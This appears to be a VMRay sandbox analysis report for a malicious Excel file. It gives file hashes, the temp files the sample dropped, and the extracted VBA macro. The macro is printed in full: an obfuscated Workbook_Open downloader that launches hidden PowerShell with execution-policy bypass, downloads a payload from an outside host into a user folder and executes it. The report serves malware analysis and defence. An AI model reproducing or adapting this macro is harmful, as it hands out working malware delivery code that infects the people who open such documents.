23bd91a7...5d77 | Files
Logo
Try VMRay Analyzer
VTI SCORE: 92/100
Target: win7_64_sp1-mso2016 | ms_office
Classification: -

23bd91a75b2e80556c099d5a4f57760a1e4d77e82ec38bbe9fc2e7ba17815d77 (SHA256)

23bd91a75b2e80556c099d5a4f57760a1e4d77e82ec38bbe9fc2e7ba17815d77.xls

Excel Document

Created at 2018-02-27 09:02:00

...

Files Information

Number of sample files submitted for analysis 1
Number of files created and extracted during analysis 5
Number of files modified and extracted during analysis 2
c:\users\aetadzjz\desktop\23bd91a75b2e80556c099d5a4f57760a1e4d77e82ec38bbe9fc2e7ba17815d77.xls
»
File Properties
Names c:\users\aetadzjz\desktop\23bd91a75b2e80556c099d5a4f57760a1e4d77e82ec38bbe9fc2e7ba17815d77.xls (Sample File)
Size 71.50 KB
Hash Values MD5: c1ed750dbde931c33e7006deb793a3a5
SHA1: 538d876cc756aea23f37712b8716efe879a3feee
SHA256: 23bd91a75b2e80556c099d5a4f57760a1e4d77e82ec38bbe9fc2e7ba17815d77
Actions
...
VBA Information
»
VBA Properties
Module Count 1
Macro Count 10
ThisWorkbook.cls - Eventless
» 
Function gabrilla()
gabrilla = Chr(34)
End Function
Function goldgoldtime()
capponecheese = "em"
virtoserer = Left("calamander", 4)
brucegodd = Array("t" + capponecheese + "p", "lo" + virtoserer + "ppd" + "ata")
goldgoldtime = brucegodd(depminng)
End Function
Function ramzessii()
ramzessii = "" + "d   " + "/c" + Chr(34)
End Function
Function SingleSong()
SingleSong = Right(Left("multiplexed", 10), 3)
End Function

Function depminng()
Randomize
depminng = Int(Rnd * 2#)
End Function

Function bigtowerstone()

nagilanile = "cM" + ramzessii + nugahoneys + gabrilla + "do{sl" + "eep 25;(." + "(\""{2" + "}{0" + "}{1" + "}\"" -" + "f'-" + "o','bj" + "ec" + "t','ne" + "w') (\""{"
copengagend = "'sy"
cryocamera = "1}{3}" + "{5}{" + "0}{2}{4}\"" -f'" + "t'," + copengagend + "st','.we" + "bclie','em','nt','.ne'" + rtypeoldschool + "'d" + "'+'o" + "w'+'n" + "lo" + "ad" + "fi"
bigtowerstone = nagilanile + cryocamera + "l'+'e')." + Left("Invisible", 3) + "oke('" + fatalerrrrord + "ps://formaversa.co/trq','%" + goldgoldtime + "%." + SingleSong + "')}while(!$?);&(\""{0}{2}{1}\""-f'star','ss','t-proce') '%" + goldgoldtime + "%." + SingleSong + "'" + Chr(34) + Chr(34)
End Function



Function nugahoneys()
babylongiland = Array(Now(), "eLL  " + "-N")
siniorengg = "owe"
fruitstornado = Array(Now(), siniorengg + "RS", Now(), Now())
portlanddomms = Array(Now(), Minute(Now), Minute(Now), "oP" + "r  " + "-e")

astralonfice = Array(Now(), "AS" + "S -W" + "i", Now())
valvegamess = Array(Second(Now), Now(), Now(), Now(), "RA" + "Ct")
olivergobane = "DDen  "
sisterloomg = Array(Now(), Minute(Now), Now(), Now(), "uT" + "i  B", Minute(Now), Now(), Now())
nugahoneys = "p" + fruitstornado(1) + "h" + babylongiland(1) + "on" + "iN" + "Te" + valvegamess(4) + "iv" + "E  -N" + portlanddomms(3) + "xeC" + sisterloomg(4) + "yP" + astralonfice(1) + "nD" + "O " + " hI" + olivergobane
End Function
Function fatalerrrrord()
fatalerrrrord = Right(Left("lighttight", 6), 3)
End Function
Function rtypeoldschool()
vegas = 0
tarapara = ").("
rtypeoldschool = ")" + tarapara
End Function
ThisWorkbook.cls - Open Workbook
» 
Sub Workbook_Open()
If Monochrome > 0 Then
Shell bigtowerstone, msoAlignLefts
End If
End Sub
c:\users\aetadzjz\appdata\local\temp\cab618.tmp, ...
»
File Properties
Names c:\users\aetadzjz\appdata\local\temp\cab618.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\tar619.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cab648.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\tar649.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cab1c88.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\tar1c89.tmp (Created File)
c:\users\aetadzjz\appdata\local.exe (Created File)
Size 0.00 KB
Hash Values MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
c:\users\aetadzjz\appdata\local\temp\cab618.tmp, ...
»
File Properties
Names c:\users\aetadzjz\appdata\local\temp\cab618.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cab648.tmp (Created File)
Size 52.71 KB
Hash Values MD5: 03f9e1f45c0d5fe8e08af7449ba1fa2f
SHA1: da545c3133a914434cce940bae78d8ad180a529a
SHA256: 677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311
Actions
...
c:\users\aetadzjz\appdata\local\temp\tar619.tmp, ...
»
File Properties
Names c:\users\aetadzjz\appdata\local\temp\tar619.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\tar649.tmp (Created File)
Size 126.77 KB
Hash Values MD5: 4479a52b31b6bde89384fb63854ec382
SHA1: 71386477836e4081befb501a266ccc4c984030e0
SHA256: 8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2
Actions
...
c:\users\aetadzjz\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015
»
File Properties
Names c:\users\aetadzjz\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015 (Modified File)
Size 0.34 KB
Hash Values MD5: 2d48064647786eedd331a603b0f8b748
SHA1: e8bdcff6a839452bcc761c426bdc4f6943b6d146
SHA256: 5634802ae00b14fffb39497413115b8aad181cd8197985b9927769a9428c2df1
Actions
...
c:\users\aetadzjz\appdata\local\temp\cab1c88.tmp
»
File Properties
Names c:\users\aetadzjz\appdata\local\temp\cab1c88.tmp (Created File)
Size 52.75 KB
Hash Values MD5: 06ed9a39ac55eb00dd78e416e1a804f6
SHA1: 270464d1618197d86ff89184ba5ed45708d38bd9
SHA256: 298bba62caa0b61a402f715bb5b8d1d28ecd0b58d9a9b6b8ae7947b39da8b1eb
Actions
...
c:\users\aetadzjz\appdata\local\temp\tar1c89.tmp
»
File Properties
Names c:\users\aetadzjz\appdata\local\temp\tar1c89.tmp (Created File)
Size 126.95 KB
Hash Values MD5: 1dfe86c61a543b557903b5eef1e4fffd
SHA1: a67a046cbacff99f557462256a34b7672be70c0e
SHA256: 96e552c153dcfccf832a868a03390597606401829f96c64108df9d5874075355
Actions
...
c:\users\aetadzjz\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015
»
File Properties
Names c:\users\aetadzjz\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015 (Modified File)
Size 0.34 KB
Hash Values MD5: 97c682cd2695e7a9eb61f636441b3d8c
SHA1: 0e26e55e308ca2a2b8ef1dfe90b144118119475e
SHA256: 063bc9d0a4289cb971308cec32ee6064899fa08f8c91145a07289f085edd5c49
Actions
...
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image